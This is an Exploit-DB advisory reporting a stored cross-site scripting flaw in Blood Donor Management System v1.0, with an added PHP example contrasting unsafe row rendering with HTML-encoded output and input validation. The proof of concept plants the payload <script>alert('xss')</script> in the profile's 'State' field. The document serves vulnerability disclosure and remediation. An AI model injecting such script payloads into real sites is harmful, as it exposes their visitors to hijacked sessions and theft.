
[webapps] Blood Donor Management System v1.0 - Stored XSS

source link: https://www.exploit-db.com/exploits/51697

Blood Donor Management System v1.0 - Stored XSS

EDB-ID: 51697
EDB Verified:
Platform: PHP
Date: 2023-09-04
Vulnerable App:

# Exploit Title: Blood Donor Management System v1.0 - Stored XSS
# Application: Blood Donor Management System
# Version: v1.0   
# Bugs:  Stored XSS
# Technology: PHP
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/blood-donor-management-system-using-codeigniter/
# Date: 15.08.2023
# Author: Ehlullah Albayrak
# Tested on: Windows


#POC
========================================
1. Log in to a user account.
2. Go to Profile.
3. Change the "State" input to the payload <script>alert("xss")</script>.
4. Go to the http://localhost/blood/welcome page and search for "O"; the XSS will be triggered.

#Payload: <script>alert("xss")</script>
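
The fix for this class of bug is to HTML-encode the stored "State" value when the search page renders it, and to validate it when the profile is saved. The PHP below is an added example, not code from Blood Donor Management System or from the advisory author; the function names, the array keys and the sample row are constructed assumptions.

```php
<?php
// Added example: hypothetical helpers, not the application's own code.

// Constructed sample row, as the database would return it after step 3 of the PoC.
$donor = [
    'name'        => 'Test Donor',
    'blood_group' => 'O',
    'state'       => '<script>alert("xss")</script>',
];

// Unsafe pattern: stored profile values are concatenated into the page unchanged,
// so markup saved in "state" reaches every visitor whose search lists this row.
function render_row_unsafe(array $d): string
{
    return "<tr><td>{$d['name']}</td><td>{$d['blood_group']}</td><td>{$d['state']}</td></tr>";
}

// Output encoding: convert HTML metacharacters (including both quote styles)
// to entities at the point where the value is written into HTML.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened pattern: every database-sourced field is encoded, not only "state".
function render_row_safe(array $d): string
{
    return '<tr><td>' . e($d['name']) . '</td><td>' . e($d['blood_group'])
         . '</td><td>' . e($d['state']) . '</td></tr>';
}

// Defence in depth on profile save: accept only letters, spaces, dots,
// apostrophes and hyphens, 2 to 64 characters. This complements output
// encoding and does not replace it.
function is_valid_state(string $state): bool
{
    return preg_match('/^[\p{L}][\p{L} .\'-]{1,63}$/u', $state) === 1;
}

var_dump(is_valid_state($donor['state']));  // validation result for the payload
echo render_row_unsafe($donor), PHP_EOL;    // script element survives intact
echo render_row_safe($donor), PHP_EOL;      // payload is emitted as inert text
```

Rows saved before the fix still hold the raw payload in the database, which is why the encoding has to happen at render time rather than only at input.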
            
